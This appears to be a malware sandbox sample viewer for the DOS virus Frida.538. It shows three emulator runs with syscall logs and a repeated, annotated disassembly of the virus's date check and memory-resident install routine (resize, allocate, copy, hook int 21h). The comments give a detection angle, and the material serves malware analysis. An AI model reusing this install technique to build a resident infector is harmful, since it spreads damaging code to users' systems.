Sample viewer

vx.netlux.org/Virus.DOS.Frida.538



Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:16:36.674435625Z 120 PC: 12a5c | UNKNOWN!
; Emulator disassembly excerpt (Intel syntax, 16-bit real mode, DOS .COM layout).
; The preceding log entry is int 21h/2Ah "Get date", which returns DH = month and
; DL = day, so the compare below tests for 1 August (the JSON lines on this page
; show the sandbox was run with different DateBased dates). Every run shown here
; still logs "Reallocate memory" at PC 12a7b, i.e. the fall-through install path;
; whether the branch to 0x12c02 was ever taken cannot be confirmed from this page.
; The int 120 (0x78) call logged just before this excerpt, paired with the later
; "Set interrupt vector (120)", looks like an already-resident self-check -- TODO confirm.
; Interrupt '33' in the log is decimal for 0x21, the DOS services vector; the
; tool's 'Random read' tag is the name of DOS *function* 21h, not of the interrupt.
; Detection angle: own-block resize + allocate + copy, followed by replacing the
; int 21h vector, is the classic memory-resident (TSR) infector footprint.
2018-12-17T22:16:36.675790695Z 42 PC: 12a60 | Get date 0x12a60: cmp dx, 0x801 ; DH:DL == 08:01 -> 1 August?
0x12a64: jne 0x12a69            ; not the trigger date: fall through to the install path
0x12a66: jmp 0x12c02            ; trigger date: branch to code not shown on this page
0x12a69: push es                ; save ES (the matching pop is outside this excerpt)
0x12a6a: mov ax, cs
0x12a6c: dec ax
0x12a6d: mov ds, ax             ; DS = CS - 1: the paragraph in front of the program, its DOS memory control block (MCB)
0x12a6f: mov ax, word ptr [3]   ; MCB+3 = size of this memory block in paragraphs
0x12a72: sub ax, 0x30b          ; new size = current size - 0x30B paragraphs
0x12a75: mov bx, ax
0x12a77: mov ah, 0x4a
0x12a79: int 0x21               ; DOS 4Ah: resize own block (logged as "Reallocate memory")
0x12a7b: mov ah, 0x48
0x12a7d: mov bx, 0x30a
0x12a80: int 0x21               ; DOS 48h: allocate 0x30A paragraphs (logged as "Allocate memory")
0x12a82: mov es, ax             ; ES = segment of the newly allocated block
0x12a84: xor di, di             ; destination offset 0 in the new block
0x12a86: mov si, 0x110          ; DS is still CS-1, so DS:0x110 == CS:0x100, the .COM entry point
0x12a89: mov cx, 0x21a          ; 0x21A = 538 bytes, matching the ".538" in the sample's name
0x12a8c: rep movsb byte ptr es:[di], byte ptr [si] ; copy (presumably the virus body) into the new block; the log then shows int 21h's vector read and replaced
2018-12-17T22:16:36.678755752Z 74 PC: 12a7b | Reallocate memory
2018-12-17T22:16:36.680033209Z 72 PC: 12a82 | Allocate memory
2018-12-17T22:16:36.681991211Z 53 PC: 9cbc5 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:16:36.683174649Z 37 PC: 9cbd8 | Set interrupt vector (Interrupt = '120' AKA 'UNKNOWN!')
2018-12-17T22:16:36.684241501Z 37 PC: 9cbe1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:16:36.685535929Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2956,"SideJobID":0}



Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:51.553920075Z 120 PC: 12a5c | UNKNOWN!
; Emulator disassembly excerpt (Intel syntax, 16-bit real mode, DOS .COM layout).
; The preceding log entry is int 21h/2Ah "Get date", which returns DH = month and
; DL = day, so the compare below tests for 1 August (the JSON lines on this page
; show the sandbox was run with different DateBased dates). Every run shown here
; still logs "Reallocate memory" at PC 12a7b, i.e. the fall-through install path;
; whether the branch to 0x12c02 was ever taken cannot be confirmed from this page.
; The int 120 (0x78) call logged just before this excerpt, paired with the later
; "Set interrupt vector (120)", looks like an already-resident self-check -- TODO confirm.
; Interrupt '33' in the log is decimal for 0x21, the DOS services vector; the
; tool's 'Random read' tag is the name of DOS *function* 21h, not of the interrupt.
; Detection angle: own-block resize + allocate + copy, followed by replacing the
; int 21h vector, is the classic memory-resident (TSR) infector footprint.
2018-12-25T11:47:51.560090768Z 42 PC: 12a60 | Get date 0x12a60: cmp dx, 0x801 ; DH:DL == 08:01 -> 1 August?
0x12a64: jne 0x12a69            ; not the trigger date: fall through to the install path
0x12a66: jmp 0x12c02            ; trigger date: branch to code not shown on this page
0x12a69: push es                ; save ES (the matching pop is outside this excerpt)
0x12a6a: mov ax, cs
0x12a6c: dec ax
0x12a6d: mov ds, ax             ; DS = CS - 1: the paragraph in front of the program, its DOS memory control block (MCB)
0x12a6f: mov ax, word ptr [3]   ; MCB+3 = size of this memory block in paragraphs
0x12a72: sub ax, 0x30b          ; new size = current size - 0x30B paragraphs
0x12a75: mov bx, ax
0x12a77: mov ah, 0x4a
0x12a79: int 0x21               ; DOS 4Ah: resize own block (logged as "Reallocate memory")
0x12a7b: mov ah, 0x48
0x12a7d: mov bx, 0x30a
0x12a80: int 0x21               ; DOS 48h: allocate 0x30A paragraphs (logged as "Allocate memory")
0x12a82: mov es, ax             ; ES = segment of the newly allocated block
0x12a84: xor di, di             ; destination offset 0 in the new block
0x12a86: mov si, 0x110          ; DS is still CS-1, so DS:0x110 == CS:0x100, the .COM entry point
0x12a89: mov cx, 0x21a          ; 0x21A = 538 bytes, matching the ".538" in the sample's name
0x12a8c: rep movsb byte ptr es:[di], byte ptr [si] ; copy (presumably the virus body) into the new block; the log then shows int 21h's vector read and replaced
2018-12-25T11:47:51.561664384Z 74 PC: 12a7b | Reallocate memory
2018-12-25T11:47:51.562692679Z 72 PC: 12a82 | Allocate memory
2018-12-25T11:47:51.564109788Z 53 PC: 9cbc5 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:51.565244429Z 37 PC: 9cbd8 | Set interrupt vector (Interrupt = '120' AKA 'UNKNOWN!')
2018-12-25T11:47:51.5663321Z 37 PC: 9cbe1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:51.567605894Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2956,"SideJobID":0}



Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:51.603581884Z 120 PC: 12a5c | UNKNOWN!
; Emulator disassembly excerpt (Intel syntax, 16-bit real mode, DOS .COM layout).
; The preceding log entry is int 21h/2Ah "Get date", which returns DH = month and
; DL = day, so the compare below tests for 1 August (the JSON lines on this page
; show the sandbox was run with different DateBased dates). Every run shown here
; still logs "Reallocate memory" at PC 12a7b, i.e. the fall-through install path;
; whether the branch to 0x12c02 was ever taken cannot be confirmed from this page.
; The int 120 (0x78) call logged just before this excerpt, paired with the later
; "Set interrupt vector (120)", looks like an already-resident self-check -- TODO confirm.
; Interrupt '33' in the log is decimal for 0x21, the DOS services vector; the
; tool's 'Random read' tag is the name of DOS *function* 21h, not of the interrupt.
; Detection angle: own-block resize + allocate + copy, followed by replacing the
; int 21h vector, is the classic memory-resident (TSR) infector footprint.
2018-12-25T11:47:51.605560689Z 42 PC: 12a60 | Get date 0x12a60: cmp dx, 0x801 ; DH:DL == 08:01 -> 1 August?
0x12a64: jne 0x12a69            ; not the trigger date: fall through to the install path
0x12a66: jmp 0x12c02            ; trigger date: branch to code not shown on this page
0x12a69: push es                ; save ES (the matching pop is outside this excerpt)
0x12a6a: mov ax, cs
0x12a6c: dec ax
0x12a6d: mov ds, ax             ; DS = CS - 1: the paragraph in front of the program, its DOS memory control block (MCB)
0x12a6f: mov ax, word ptr [3]   ; MCB+3 = size of this memory block in paragraphs
0x12a72: sub ax, 0x30b          ; new size = current size - 0x30B paragraphs
0x12a75: mov bx, ax
0x12a77: mov ah, 0x4a
0x12a79: int 0x21               ; DOS 4Ah: resize own block (logged as "Reallocate memory")
0x12a7b: mov ah, 0x48
0x12a7d: mov bx, 0x30a
0x12a80: int 0x21               ; DOS 48h: allocate 0x30A paragraphs (logged as "Allocate memory")
0x12a82: mov es, ax             ; ES = segment of the newly allocated block
0x12a84: xor di, di             ; destination offset 0 in the new block
0x12a86: mov si, 0x110          ; DS is still CS-1, so DS:0x110 == CS:0x100, the .COM entry point
0x12a89: mov cx, 0x21a          ; 0x21A = 538 bytes, matching the ".538" in the sample's name
0x12a8c: rep movsb byte ptr es:[di], byte ptr [si] ; copy (presumably the virus body) into the new block; the trace on this page ends here